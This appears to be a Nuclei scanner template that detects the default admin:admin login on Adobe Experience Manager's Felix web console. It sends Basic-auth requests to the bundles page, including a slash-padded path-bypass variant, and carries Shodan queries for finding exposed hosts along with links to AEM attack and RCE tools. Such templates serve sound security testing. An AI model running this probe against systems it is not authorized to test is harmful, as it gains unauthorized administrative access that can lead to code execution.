id: aem-felix-console

info:
  name: Adobe Experience Manager Felix Console - Default Login
  author: DhiyaneshDk
  severity: high
  description: Adobe Experience Manager Felix Console contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. Remote code execution may also be possible via installation of OSGI bundle.
  reference:
    - https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py
    - https://github.com/0ang3el/aem-rce-bundle
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 2
    shodan-query:
      - http.title:"AEM Sign In"
      - http.component:"Adobe Experience Manager"
  tags: default-login,misconfig,aem,adobe

http:
  - method: GET
    path:
      - "{{BaseURL}}/system/console/bundles"
      - "{{BaseURL}}///system///console///bundles"

    headers:
      Authorization: Basic {{base64(username + ':' + password)}}
    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>Adobe Experience Manager Web Console - Bundles</title>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4a0a004730450220257951b21ffea54e205cda7777f91079063d023abdbeb0e604283a9754c7c139022100e814c7ecc114292caeba6e33d7b0edbe6ce91f3baeb0deec1b5dd1f16a78fd28:922c64590222798bb761d5b6d8e72950